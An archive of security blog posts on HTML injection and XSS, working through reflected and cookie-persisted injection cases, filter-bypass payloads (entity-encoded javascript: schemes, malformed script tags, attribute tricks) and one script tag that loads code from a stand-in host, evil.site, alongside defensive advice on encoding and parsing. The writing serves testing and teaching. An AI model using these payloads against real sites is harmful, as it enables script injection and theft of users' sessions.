Category Archives: html injection

A True XSS That Needs To Be False

It is on occasion necessary to persuade a developer that an HTML injection vuln capitulates to exploitation notwithstanding the presence within of a redirect that conducts the browser away from the exploit’s embodied alert(). Sometimes, parsing an expression takes more effort than breaking it.

So, redirect your attention from defeat to the few minutes of creativity required to adjust an unproven injection into a working one. Here’s the URL we start with:

https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="

The page reflects the value of this id parameter within an href attribute. There’s nothing remarkable about this payload or how it appears in the page. At least, not at first:

<a href="mailto:support@web.site?subject=error reference: "onmouseover=alert(9);a="">support@web.site</a>

Yet the browser goes into an infinite redirect loop without ever launching the alert. We explore the page a bit more to discover some anti-framing JavaScript where our URL shows up. (Bizarrely, the anti-framing JavaScript shows up almost 300 lines into the <body> element — well after several other JavaScript functions and page content. It should have been present in the <head>. It’s like the developers knew they should do something about clickjacking, heard about a top.location trick, and decided to randomly sprinkle some code in the page. It would have been simpler and more secure to add an X-Frame-Options header.)

<script type="text/javascript">
if (window.top.location != 'https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="') {
    window.top.location.href = 'https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="';
}
</script>

The URL in your browser bar may look exactly like the URL in the inequality test. However, the location.href property contains the URL-encoded (a.k.a. percent encoded) version of the string, which causes the condition to resolve to true, which in turn causes the browser to redirect to the new location.href. As such, the following two strings are not identical:

https://web.site/UnknownError.aspx?id=%22onmouseover=alert(9);a=%22
https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="
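
A quick way to see the mismatch outside the page is to run the raw string through a URL parser. The sketch below assumes a JavaScript runtime that provides the standard URL class (modern browsers, Node.js); the variable names are illustrative and not taken from the site.

```javascript
// The string the server wrote into the inequality test, quotes intact.
const reflected = 'https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="';

// Parsing it the way a browser does percent-encodes the quotes in the query.
const serialized = new URL(reflected).href;

// The page compares these two values, so the test is always unequal
// and the redirect fires on every load.
const redirects = serialized != reflected;

console.log(serialized);
console.log(redirects);
```

The parentheses, semicolon, and equal signs pass through untouched; only the quotes change, which is enough to keep the two strings from ever matching.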

Since the anti-framing triggers before the browser encounters the affected href, the onmouseover payload (or any other payload inserted in the tag) won’t trigger.

This isn’t a problem. Just redirect your onhack event from the href to the if statement. This step requires a little bit of creativity because we’d like the conditional to ultimately resolve false to prevent the browser from being redirected. It makes the exploit more obvious.

JavaScript syntax provides dozens of options for modifying this statement. We’ll choose concatenation to execute the alert() and a Boolean operator to force a false outcome.

The new payload is

'+alert(9)&&null=='

Which results in this:

<script type="text/javascript">
if (window.top.location != 'https://web.site/UnknownError.aspx?id='+alert(9)&&null=='') {
    window.top.location.href = 'https://web.site/UnknownError.aspx?id='+alert(9)&&null=='';
}
</script>

Note that we could have used other operators to glue the alert() to its preceding string. Any arithmetic operator would have worked.

We used innocuous characters to make the statement false. Ampersands and equal signs are familiar characters within URLs. But we could have tried any number of alternates. Perhaps the presence of “null” might flag the URL as a SQL injection attempt. We wouldn’t want to be defeated by a lucky WAF rule. All of the following alternate tests return false:

undefined==''
[]!=''
[]===''
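
The grouping of the injected expression can be checked away from the browser. This is a minimal sketch: alert() is replaced by a stub that records its argument, and topLocation is a made-up stand-in for window.top.location, so both are assumptions rather than the page’s real objects.

```javascript
// Stand-in for the browser's alert(); like the real one it returns undefined.
const calls = [];
function alert(msg) { calls.push(msg); }

// Stand-in for window.top.location, which stringifies to the encoded URL.
const topLocation = 'https://web.site/UnknownError.aspx?id=%27+alert(9)&&null==%27';

// The reflected test. Operator precedence groups it as:
//   (topLocation != ('...id=' + alert(9))) && (null == '')
const redirect = topLocation != 'https://web.site/UnknownError.aspx?id=' + alert(9) && null == '';

// The alternates listed above, each false for a different reason.
const alternates = [undefined == '', [] != '', [] === ''];

console.log(calls, redirect, alternates);
```

The alert() has to run in order to build the right-hand string, so the payload executes even though the overall condition ends up false and the redirect is skipped.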

This example demonstrated yet another reason to pay attention to the details of an HTML injection vuln. The page reflected a URL parameter in two locations with different execution contexts. From the attacker’s perspective, we’d have to resort to intrinsic events or injecting new tags (e.g. <script>) after the href, but the if statement drops us right into a JavaScript context. From the defender’s perspective, we should have at the very least used an appropriate encoding on the string before writing it to the page; URL encoding would have been a logical step.

A Hidden Benefit of HTML5

Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this task, but be prepared for complex elements and attributes. And good luck dealing with code inside <script> tags.

Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that works around validation filters and avoids being defeated by output encoding schemes. Sometimes it’s necessary to wander the dusty passages of parsing rules in search of a hidden door that opens an element to being exploited.


HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.

And every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of a hidden input field. In the following example, note that the quotation mark has not been filtered or encoded.

http://web.site/search?sortOn=x"

<input type="hidden" name="sortOn" value="x"">

If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling brackets by including a <z" sequence to consume it. A <z> tag with an empty attribute is harmless.

http://web.site/search?sortOn=x"><script>alert(9)</script><z"

<input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">

Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.

<input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">

Or, taking advantage of new HTML5 events, we’d use the onfocus event to execute the JavaScript rather than wait for a mouseover.

<input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">

The catch here is that the hidden input type doesn’t receive those events and therefore won’t trigger the alert. But it’s not yet time to give up. We could work on a theory that changing the input type would enable the field to receive these events.

<input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">

But modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, 8.1.2.3 Attributes:

“There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.”

Okay, we have a constraint, but no instructions on how to handle this error condition. Without further instructions, it’s not clear how a browser should handle multiple attribute names. Ambiguity leads to security problems; it’s to be avoided at all costs.

From the spec, 8.2.4.35 Attribute name state

“When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”

So, we’ll never be able to fool a browser by “casting” the input field to a different type by a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.

(The messy history of HTML continues unabated by the optimism of a version number. The HTML Living Standard defines its parsing rules in section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)

Think back to our injection example. Imagine the order of attributes were different for the vulnerable input tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.

<input name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >
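
The first-one-wins rule is easy to model. The following is a toy sketch of the duplicate-attribute handling quoted from the spec, not a real HTML tokenizer; effectiveAttributes is a hypothetical helper, and the attribute lists are written out by hand in the order a parser would meet them.

```javascript
// Toy model of the "attribute name state" rule: when a name repeats on a
// start tag, the later attribute is dropped along with its value.
function effectiveAttributes(pairs) {
  const seen = new Map();
  for (const [name, value] of pairs) {
    const key = name.toLowerCase(); // names match ASCII case-insensitively
    if (!seen.has(key)) {
      seen.set(key, value);
    }
  }
  return seen;
}

// Template writes type="hidden" before the injected value.
const typeFirst = effectiveAttributes([
  ['type', 'hidden'], ['name', 'sortOn'], ['value', 'x'],
  ['type', 'text'], ['autofocus', ''], ['onfocus', 'alert(9)//"'],
]);

// Template writes type="hidden" after the injected value.
const typeLast = effectiveAttributes([
  ['name', 'sortOn'], ['value', 'x'],
  ['type', 'text'], ['autofocus', ''], ['onfocus', 'alert(9)//"'],
  ['type', 'hidden'],
]);

console.log(typeFirst.get('type')); // hidden
console.log(typeLast.get('type'));  // text
```

In both cases the injected onfocus attribute survives; what changes is whether the field is still hidden, and therefore whether it can ever receive focus.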

HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection, but the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.

Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as “the absence of unmitigatable surprise”. Look for flaws in modern browsers where this trick works (e.g. maybe a compatibility mode or not using an explicit <!doctype html> weakens the browser’s parsing algorithm). With luck, most of the problems you discover will be implementation errors to be fixed in a particular browser rather than a design change required of the spec.

HTML5 gives us a better design to help minimize parsing-based security problems. It’s up to web developers to design better sites to help maximize the security of our data.

The Wrong Location for a Locale

Web sites that wish to appeal to broad audiences use internationalization techniques that enable content and labeling to be substituted based on a user’s language preferences without having to modify layout or functionality. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and a member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encodings like UTF-8 were designed to enable applications to represent the written symbols for these languages. (No one creates web sites to support parseltongue because snakes can’t use keyboards and they always eat the mouse. But that still doesn’t seem fair; they’re pretty good at swipe gestures.)

A site’s written language conveys utility and worth to its visitors. A site’s programming language gives headaches and stress to its developers. Developers prefer to explain why their programming language is superior to others. Developers prefer not to explain why they always end up creating HTML injection vulnerabilities with their superior language.

Several previous posts have shown how HTML injection attacks are reflected from a URL parameter in a web page, or even how the URL fragment — which doesn’t make a round trip to the web site — isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, the payload having been stored somewhere for later retrieval, such as being associated with a user’s session by a tracking cookie.

And sometimes the attack exists and persists in the cookie itself.

Here’s a site that keeps a locale parameter in the URL, right where we like to test for vulns like XSS.

http://web.site/page.do?locale=en_US

There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

http://web.site/page.do?locale=en_US%22%3E%3Cscript%3Ealert%289%29%3C/script%3E

No reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How inhibiting of them.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.

http://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%3Ealert(9)%3C/script%3E%0A%0D

The catch is that some key characters in the hack have been rendered into an HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body>:

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&#034;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

">

And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&#034;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

"></span>

And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

" id="currentLocale" />

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages. With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag of the following example; we seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">

<script>alert(9)</script>

" xml:lang="en-US">

<script>alert(9)</script>

">
<head>

And something we hadn’t seen before on this site, a reflection inside a JavaScript variable near the bottom of the <body> element. (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!--  Include the Reference Page Tag script -->
<!--//BEGIN REFERENCE PAGE TAG SCRIPT-->
<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US"&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

';
</script>

Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:

http://web.site/page.do?locale=en_US">%0A%0D';alert(9)//

Too bad the apostrophe character (') remains encoded:

<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US&#034;&gt;

&#039;;alert(9)//';
</script>

That countermeasure shouldn’t stop us. This site’s developers took the time to write some vulnerable code. The least we can do is spend the effort to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

http://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%20src=%22http://evil.site/%22%3E%3C/script%3E%0A%0D

As expected, the page.do’s response contains the HTML encoded version of the payload. We lose quotes (some of which are actually superfluous for this payload).

<body id="lang-en" class="tier-level-one cntry-US&#034;&gt;

&lt;script src=&#034;http://evil.site/&#034;&gt;&lt;/script&gt;

">

But if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by evil.site.

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">

<script src="http://evil.site/"></script>

" xml:lang="en-US">

<script src="http://evil.site/"></script>

">
<head>

Yé! utúvienyes! Done and exploited. But what was the complete mechanism? The GET request to the contact page didn’t contain the payload — it’s just

http://web.site/contactUs.do

So, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A;
        JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F;
        sessionLocale="en_US\">  <script src=\"http://evil.site/\"></script>  ";
        exScreenRes=done

Sometime between the request to page.do and the request to the contact page, the site decided to take the locale parameter from page.do and place it in a cookie. Then, the site took the cookie presented in the request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript), and let the user specify a custom locale. The locale isn’t as picturesque as Hogwarts, nor as destitute as District 12, but Hermione and Katniss would rip apart a vuln like this.
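
A locale has a tiny, predictable grammar, so one defensive option is to reject anything else before it ever reaches the cookie. The sketch below is an assumption about how such a check might look; normalizeLocale, the pattern, and the en_US fallback are hypothetical and not taken from the site.

```javascript
// Hypothetical allowlist: two lowercase letters, an underscore, two uppercase letters.
const LOCALE_PATTERN = /^[a-z]{2}_[A-Z]{2}$/;
const DEFAULT_LOCALE = 'en_US';

// Return the input only when it matches the allowlist; otherwise fall back.
function normalizeLocale(input) {
  return typeof input === 'string' && LOCALE_PATTERN.test(input) ? input : DEFAULT_LOCALE;
}

console.log(normalizeLocale('fr_CA'));
console.log(normalizeLocale('en_US">\n\r<script src="http://evil.site/"></script>\n\r'));
```

Input validation like this complements output encoding at each reflection point; it doesn’t replace it, since the contact page would still be writing a cookie value into markup without encoding it.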

Insistently Marketing Persistent XSS

Want to make your site secure? Write secure code. Want to make it less secure? Add someone else’s code to it. Even better, do it in the “cloud.”

The last few HTML injection articles here demonstrated the reflected variant of the attack. The exploit appears within the immediate response to the request that contains the XSS payload. These kinds of attacks are also ephemeral because the exploit disappears once the victim browses away from the infected page. The attack must be re-delivered for every visit to the vulnerable page.

A persistent HTML injection is more insidious. The web site still reflects the payload into a page, but not necessarily in the immediate response to the request that delivered the payload. You have to find the payload, e.g. the friendly alert(), in some other area of the app. In many cases the payload only needs to be delivered once. Any subsequent visit to the page where it’s reflected exposes the visitor to the exploit. This is very dangerous when the page has a one-to-many relationship where one attacker infects the page and many users visit the page via normal “safe” links that don’t have an XSS payload.

Persistence comes in many guises and durations. Here’s one that associates the persistence with a cookie.

Our example of the day decided to track users for marketing and advertising purposes. There’s little reason to love user tracking (unless 95% of your revenue comes from it), but you might like it a little more if you could use it for HTML injection.

The hack starts off like any other reflected XSS test. Another day, another alert:

http://web.site/page.aspx?om=alert(9)

But the response contains nothing interesting. It didn’t reflect any piece of the payload, not even in an HTML encoded or stripped version. And — spoiler alert — not in the following script block:

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop4="quote";
s.events="event2";
s.pageName="quote1";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

But we’re not at the point of nothing ventured, nothing gained. We’re just at the point of nothing reflected, something might still be wrong.

So we poke around at some more links on the site. Just visiting them as any user might without injecting any new payloads, working under the assumption that the payload could have found a persistent lair to curl up in and wait for an unsuspecting victim.

Sure enough we find a reflection in an (apparently) unrelated link. Note that the payload has already been delivered. This request has no indicators of XSS:

http://web.site/wacky/archives/2012/cute_animal.aspx

We find the alert() nested inside a JavaScript variable where, sadly, it remains innocuous and unexploited. For reasons we don’t care about, a comment warns us not to ALTER ANYTHING BELOW THIS LINE!

You don’t have to shout. We’ll just alter things above the line.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17="alert(9)";
s.pageName="ar_2012_cute_animal";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

There are plenty of fun ways to inject into JavaScript string concatenation. We’ll stick with the most obvious plus (+) operator. To do this we need to return to the original injection point and alter the payload (just don’t touch ANYTHING BELOW THIS LINE!).

http://web.site/page.aspx?om="%2balert(9)%2b"

We head back to the cute_animal.aspx page to see how the payload fared. Before we can click to Show Page Source we’re greeted with that happy hacker greeting, the friendly alert() window.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17=""+alert(9)+"";
s.pageName="ar_2012_cute_animal";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

After experimenting with a few variations on the request to the reflection point (the cute_animal.aspx page) we narrow the persistent carrier to a cookie value. The cookie is a long string of hexadecimal digits whose length and content do not change between requests. This is a good hint that it’s some sort of UUID that points to a record in a data store that contains the XSS payload from the om variable. (The cookie’s unchanging nature implies that the payload is not inserted into the cookie, encrypted or otherwise.) Get rid of the cookie and the alert no longer appears.

The cause appears to be string concatenation where the s.prop17 variable is assigned a value associated with the cookie. It’s a common, basic, insecure design pattern.
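
For contrast, here is one way a server-side template could serialize the stored value so that it stays a string. This is a sketch under stated assumptions: toScriptString is a hypothetical helper, the tracking script’s real server code is unknown, and the approach (JSON.stringify plus a few extra escapes) is a common pattern rather than anything the site is known to use.

```javascript
// Hypothetical helper: serialize untrusted text as a JavaScript string literal
// that is safe to place inside an inline <script> block.
function toScriptString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')      // keeps "</script>" from ending the block
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028') // line separators are not escaped by JSON.stringify
    .replace(/\u2029/g, '\\u2029');
}

// The payload from the om parameter, after URL decoding.
const om = '"+alert(9)+"';
const line = 's.prop17=' + toScriptString(om) + ';';

console.log(line);
```

The quotes arrive backslash-escaped, so the plus signs and the alert(9) remain inert characters inside s.prop17 instead of becoming operators and a function call.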

So, we have a persistent HTML injection tied to a user-tracking cookie. A diminishing factor in this vuln’s risk is that the effect is limited to individual visitors. It’d be nice if we could recommend getting rid of user tracking as the security solution, but the real issue is applying good software engineering practices when inserting client-side data into HTML. But we’re not done with user tracking yet. There’s this concept called privacy…

But that’s a story for another day.

Implicit HTML, Explicit Injection

When designing security filters against HTML injection you need to outsmart the attacker, not the browser. HTML’s syntax is more forgiving of mis-nested tags, unterminated elements, and entity-encoding compared to formats like XML. This is a good thing, because it ensures a User-Agent renders a best-effort layout for a web page rather than bailing on errors or typos that would leave visitors staring at blank pages or incomprehensible error messages.

It’s also a bad thing, because User-Agents have to make educated guesses about a page author’s intent when they encounter unexpected markup. This is the kind of situation that leads to browser quirks and inconsistent behavior.

One of HTML5’s improvements is a codified algorithm for parsing content. In the past, browsers not only had quirks, but developers would write content specifically to take advantage of those idiosyncrasies, giving us a world where sites worked well with one and only one version of Internet Explorer (or Mozilla, etc.). A great deal of blame lies at the feet of site developers who refused to consider good HTML design patterns in favor of the principle of Code Relying on Advanced Persistent Stubbornness.

Parsing Disharmony

Untidy markup is a security hazard. It makes HTML injection vulnerabilities more difficult to detect and block, especially for regex-based countermeasures.

Regular expressions have irregular success as security mechanisms for HTML. While regexes excel at pattern-matching, they fare miserably in semantic parsing. Once you start building a state mechanism for element start characters, token delimiters, attribute names, and so on, anything other than a narrowly-focused regex becomes unwieldy at best.

First, let’s take a look at some simple elements with uncommon syntax. Regular readers will recognize a favorite XSS payload of mine, the img tag:

<img/alt=""src="."onerror=alert(9)>

Spaces aren’t required to delimit attribute name/value pairs when the value is marked by quotes. Also, the element name may be separated from its attributes with whitespace or the forward slash. We’re entering strange parsing territory. For some sites, this will be a trip to the undiscovered country.

Delimiters are fun to play with. Here’s a case where empty quotes separate the element name from an attribute. Note the difference in value delineation. The id attribute has an unquoted value, so we separate it from the subsequent attribute with a space. The href has an empty value delimited with quotes. The parser doesn’t need whitespace after a quoted value, so we put onclick immediately after.

<a""id=a href=""onclick=alert(9)>foo</a>

User-Agents try their best to make sites work. As a consequence, they’ll interpret markup in surprising ways. Here’s an example that mixes start and end tag tokens in order to deliver an XSS payload:

<script/<a>alert(9)</script> 

We can adjust the end tag if there’s a filter watching for </script>. Note there is a space between the last </script and </a>.

<script/<a>alert(9)</script </a>

Successful HTML injection thrives on bad mark-up to bypass filters and take advantage of browser quirks. Here’s another case where the browser accepts an incorrectly terminated tag. If the site turns the following payload’s %0d%0a into \r\n (carriage return, line feed) when it places the payload into HTML, then the browser might execute the alert function.

<script%0d%0aalert(9)</script>

Or you might be able to separate the lack of closing > character from the alert function with an intermediate HTML comment:

<script%20<!--%20-->alert(9)</script>

The way browsers deal with whitespace is a notorious source of security problems. The Samy worm exploited IE’s tolerance for splitting a javascript: scheme with a line feed.

<div id=mycode style="BACKGROUND: url('java 
script:eval(document.all.mycode.expr)')" expr="alert(9)"></div>

Or we can throw an entity into the attribute list. The following is bad markup. But if it’s bad markup that bypasses a filter, then it’s a good injection.

<a href=""&amp;/onclick=alert(9)>foo</a>

HTML entities have a special place within parsing and injection attacks. They’re most often used to bypass string-matching. For example, the following three JavaScript schemes use an entity for the “s” character:

java&#115;cript:alert(9)
java&#x73;cript:alert(9)
java&#x0073;cript:alert(9)

The danger with entities and parsing is that you must keep track of the context in which you decode them. But you also need to keep track of the order in which you resolve entities (or otherwise normalize data) and when you apply security checks. In the previous example, if you had checked for “javascript” in the scheme before resolving the entity, then your filter would have failed. Think of it as a time of check to time of use (TOCTOU) problem that’s affected by data transformation rather than the more commonly thought-of race condition.
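
The ordering problem fits in a few lines. In this sketch, decodeNumericEntities handles only numeric character references (a real HTML decoder also deals with named entities and malformed input), and hasJavaScriptScheme is a hypothetical filter; neither comes from a particular library.

```javascript
// Minimal decoder for numeric character references only (&#115; or &#x73;).
function decodeNumericEntities(text) {
  return text.replace(/&#(x[0-9a-f]+|[0-9]+);/gi, (match, body) => {
    const isHex = body[0] === 'x' || body[0] === 'X';
    const codePoint = parseInt(isHex ? body.slice(1) : body, isHex ? 16 : 10);
    return String.fromCodePoint(codePoint);
  });
}

// Hypothetical filter that looks for a javascript: scheme.
function hasJavaScriptScheme(text) {
  return /^\s*javascript:/i.test(text);
}

const payloads = [
  'java&#115;cript:alert(9)',
  'java&#x73;cript:alert(9)',
  'java&#x0073;cript:alert(9)',
];

// Check, then decode: the filter sees "java&#115;cript" and lets it through.
const checkedFirst = payloads.map((p) => hasJavaScriptScheme(p));

// Decode, then check: the filter sees what the browser will see.
const decodedFirst = payloads.map((p) => hasJavaScriptScheme(decodeNumericEntities(p)));

console.log(checkedFirst, decodedFirst);
```

The same filter gives opposite answers depending only on when it runs relative to the decoding step.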

Security

User Agents are often forced to second-guess the intended layout of error-ridden pages. HTML5 brings more sanity to parsing markup. But we still don’t have a mechanism to help browsers distinguish between typos, intended behavior, and HTML injection attacks. There’s no equivalent to prepared statements for SQL.

  • Fix the vulnerability, not the exploit.
    It’s not uncommon for developers to blacklist a string like alert or javascript under the assumption that doing so prevents attacks. That sort of thinking mistakes the payload for the underlying problem. The problem is placing user-supplied data into HTML without taking steps to ensure the browser renders the data as text rather than markup.
  • Test with multiple browsers.
    A payload that takes advantage of a rendering quirk for browser A isn’t going to exhibit security problems if you’re testing with browser B.
  • Prefer parsing to regex patterns.
    Regexes may be as effective as they are complex, but you pay a price for complexity. Trying to read someone else’s regex, or even maintaining your own, becomes more error-prone as the pattern becomes longer.
  • Encode characters.
    You’ll be more successful at blocking HTML injection attacks if you consistently apply encoding rules for characters like < and > and prevent quotes from breaking attribute values.
  • Enforce rules strictly.
    Ambiguity for browsers enables them to recover from errors gracefully. Ambiguity for security weakens the system.

HTML injection attacks try to bypass filters in order to deliver a payload that a browser will render. Security filters should be strict, but not so myopic that they miss “improper” HTML constructs that a browser will happily render.
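
As a concrete instance of the “encode characters” advice, here is a minimal sketch of an encoder for values written into HTML text or a quoted attribute. escapeHtml and HTML_ESCAPES are hypothetical names, and the input is a hidden-field style payload used purely for illustration.

```javascript
// Hypothetical encoder for text placed in element content or a quoted attribute.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// A payload that tries to close the value attribute and add its own attributes.
const sortOn = 'x"autofocus/onfocus=alert(9)//';
const field = '<input type="hidden" name="sortOn" value="' + escapeHtml(sortOn) + '">';

console.log(field);
```

This encoding suits HTML text and quoted attribute values only. A value reflected into a script block or a URL sits in a different context and needs that context’s own encoding.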

Know Your JavaScript (Injections)

HTML injection vulnerabilities make a great Voigt-Kampff test for proving you care about security. We need some kind of tool to deal with developers who take refuge in the excuse, “But it’s not exploitable.”

Companies like MasterCard and VISA created the PCI standard to make sure web sites care about vulns like XSS. Parts of the standard are pretty strict, to the point where a site faces fines or becomes unable to process credit cards if it fails to fix vulns quickly. This also means that every once in a while a site’s developers refuse to acknowledge a vuln is valid because they don’t see an alert() pop up.

The poor dears.

(1) Probe for Reflected Values

Let’s examine Exhibit One: A Means of Writing Arbitrary Mark-up into a Page. In this case, the URL parameter’s value is written into a JavaScript string variable called pageUrl. HTML injection doesn’t get much easier than this.

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27

The code now has an extra apostrophe hanging out at the end of pageUrl:

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}

But when the devs go to check the vuln, they show that it’s not possible to issue an alert(). For example, they update the payload with something like this:

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;alert(9)//

None of the variations on the payload seem to work. They terminated the string properly. The value gets reflected. But nothing results in JavaScript execution.

(2) Break Out of One Context, Break Another

It’s too bad our developers didn’t take the time to, you know, debug the problem. After all, HTML injection attacks are a coding exercise like any other. (Although perhaps a bit more fun.)

For starters, our payload is reflected inside a JavaScript function scope. Maybe the SetLanCookie() function just isn’t being called within the page? That would explain why the alert() never runs. A reasonable step is to close the function with a curly brace and dangle a naked alert() within the script block.

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;var%20a=%27

The following code confirms that the site still reflects the payload. However, our browser still isn’t visited by the expected pop-up.

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'}alert(9);var a='';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}

But browsers have Developer Consoles and Error Consoles that print friendly messages about their activity. Taking a peek at the console output reveals why we haven’t yet succeeded in tossing up the alert() box. The script block still contains syntax errors. And unhappy syntax makes an unhappy hacker. (And a lazy one.)

[14:36:45.923] SyntaxError: function statement requires a name @ https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert(9);function(){var%20a=%27  SomePage.aspx:345

[14:42:09.681] SyntaxError: syntax error @ https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;}()alert(9);function(){var%20a=%27  SomePage.aspx:345
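
Those console messages make sense once you remember that a browser parses an entire script block before running any of it: one syntax error and nothing in the block executes, injected alert() included. Here is a minimal sketch of that check outside the browser. It assumes the parameter value lands, unencoded, in the template shown above; reflect and syntaxErrorOf are hypothetical helper names, and new Function is used only as a convenient way to ask a JavaScript engine whether text parses (the result is never called).

```javascript
// Rebuild the script block the way the page appears to: the parameter value
// is dropped, unencoded, between the quotes of the pageUrl assignment.
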